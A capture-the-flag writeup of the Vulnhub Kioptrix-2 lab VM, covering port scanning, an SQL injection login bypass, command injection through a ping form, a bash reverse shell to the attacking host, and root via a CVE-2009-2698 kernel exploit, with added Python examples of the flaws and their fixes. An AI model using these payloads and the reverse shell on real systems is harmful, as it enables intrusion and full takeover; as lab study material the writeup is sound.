Welcome to the Kioptrix-2 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Kioptrix-2
Tags: Vulnhub, Easy, Linux, OSCP
Platform: Vulnhub
Difficulty: Easy
OS: Linux
Kioptrix: Level 1.1 (#2)
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:35 CEST
Nmap scan report for 172.20.10.7
Host is up (0.0016s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
792/tcp open unknown
3306/tcp open mysql
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80,111,443,631,792,3306 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:38 CEST
Nmap scan report for 172.20.10.7
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 789/udp status
|_ 100024 1 792/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-06-30T16:28:42+00:00; -3h09m41s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
792/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -3h09m41s
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 172.20.10.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds
Port 80
On the website on port 80 we find a login form.
Nmap showed MySQL listening on the host, so the form is very likely backed by a MySQL query. We try the classic injection ' OR '1'='1 in the login fields.
And we are in!
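To see why that payload logs us in, here is an added example (not code from the writeup or from the Kioptrix VM) of the shape a login query has to take for ' OR '1'='1 to work, next to the parameterised version that does not. sqlite3 stands in for the target's MySQL; the users table and its one account are constructed sample data, and the exact query text on the target is an assumption.

```python
"""Added example: login bypass with ' OR '1'='1 against a concatenated query.

sqlite3 stands in for the MySQL server seen on port 3306; the quoting rules
that matter for this payload are the same in both.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one admin account with a password we never type.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Assumed shape of the vulnerable handler: input pasted into the SQL text.

    Returns (query_as_sent, matched_username_or_None) so the effect is visible.
    """
    query = (
        "SELECT username FROM users WHERE username='%s' AND password='%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return query, (row[0] if row else None)


def fixed_login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The payload from the writeup. Inside the concatenated query it closes the
# quoted string, and the trailing OR '1'='1' makes the WHERE clause true for
# every row, so the first user (admin) is "authenticated".
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    query, user = vulnerable_login(conn, PAYLOAD, PAYLOAD)
    print(query)
    print("vulnerable login matched:", user)
    print("parameterised login matched:", fixed_login(conn, PAYLOAD, PAYLOAD))
```

Note the operator precedence: AND binds tighter than OR, so the injected clause reads username='' OR ('1'='1' AND password='') OR '1'='1', and the last OR alone is enough to match every row.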
Once logged in, we find a form that pings an IP address supplied by the user.
Exploitation
To test for command injection we submit the loopback address with the id command chained after a semicolon. If the output contains the result of id, the input is reaching a shell:
127.0.0.1;id
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.010 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.043 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.010/0.022/0.043/0.015 ms, pipe 2
uid=48(apache) gid=48(apache) groups=48(apache)
Yeah, we have RCE, let's go for a shell!
We start a listener on our machine and submit the form again with a bash reverse shell as the payload (172.20.10.4 is our attacking host):
127.0.0.1;bash -i >& /dev/tcp/172.20.10.4/8787 0>&1
We wait a few seconds...
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.7] 32769
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
And we have a shell as apache!
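The ping form's bug, and the fix a developer should have shipped, as an added example that is not code from the writeup or from the Kioptrix VM. It assumes the target's handler runs something like ping -c 3 <input> through a shell; echo stands in for ping so the example runs offline, and the injected command is echo INJECTED rather than id so the output is deterministic.

```python
"""Added example: the ping form's command injection and a hardened handler.

Assumption: the vulnerable page hands the user's input to a shell as part
of a ping command line. `echo` replaces `ping` so nothing touches the
network; the shell parsing is identical either way.
"""
import ipaddress
import subprocess


def vulnerable_ping(target: str) -> str:
    # Assumed shape of the target's handler: input pasted into a shell
    # command line, so ';', '|', '&&', backticks and $() all reach /bin/sh.
    command = "echo ping -c 3 %s" % target
    return subprocess.run(
        command, shell=True, capture_output=True, text=True
    ).stdout


def validate_target(target: str) -> str:
    """Positive validation: accept only a literal IPv4/IPv6 address."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        raise ValueError("not an IP address: %r" % target) from None


def is_rejected(target: str) -> bool:
    """True if the hardened handler would refuse this input."""
    try:
        validate_target(target)
        return False
    except ValueError:
        return True


def hardened_ping(target: str) -> str:
    # Two independent defences: validate the input as an address, and run
    # the command as an argv list with no shell, so metacharacters in the
    # argument are never interpreted even if validation were bypassed.
    ip = validate_target(target)
    argv = ["echo", "ping", "-c", "3", ip]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed input, same shape as the writeup's 127.0.0.1;id
    payload = "127.0.0.1;echo INJECTED"
    print("vulnerable:", vulnerable_ping(payload))
    print("hardened rejects payload:", is_rejected(payload))
    print("hardened:", hardened_ping("127.0.0.1"))
```

Input validation alone is not enough here: a list-form exec without a shell is what stops the semicolon from ever being parsed, and the allow-list of one address type keeps hostnames (and therefore DNS lookups an attacker controls) out of the argument too.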
Post exploitation
Privilege escalation: apache to root
Enumeration
Linux Exploit Suggester 2
bash-3.00$ perl linux-exploit-suggester-2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.9
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] exp.sh
[3] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[4] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[5] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[6] krad
[7] krad3
Source: http://exploit-db.com/exploits/1397
[8] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[9] py2
[10] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[11] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[12] udp_sendmsg_32bit
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[13] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
The kernel is 2.6.9. CVE-2009-2698 is a NULL pointer dereference in the kernel's udp_sendmsg function, fixed in 2.6.19, and the public exploit the suggester lists targets 32-bit kernels, so this is the one we go for.
Exploitation
CVE-2009-2698
The link the script gives no longer works, but the exploit is easy to find online by searching for the file name or the CVE. The target has gcc, so we compile it there. Two checks before running it: confirm that uname -m reports a 32-bit kernel, since the exploit is written for i386, and take a snapshot of the VM first, because a failed kernel exploit usually hangs or crashes the box.
bash-3.00$ gcc udp_sendmsg_32bit.c -o 0x82-CVE-2009-2698 && ./0x82-CVE-2009-2698
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
And that's all folks!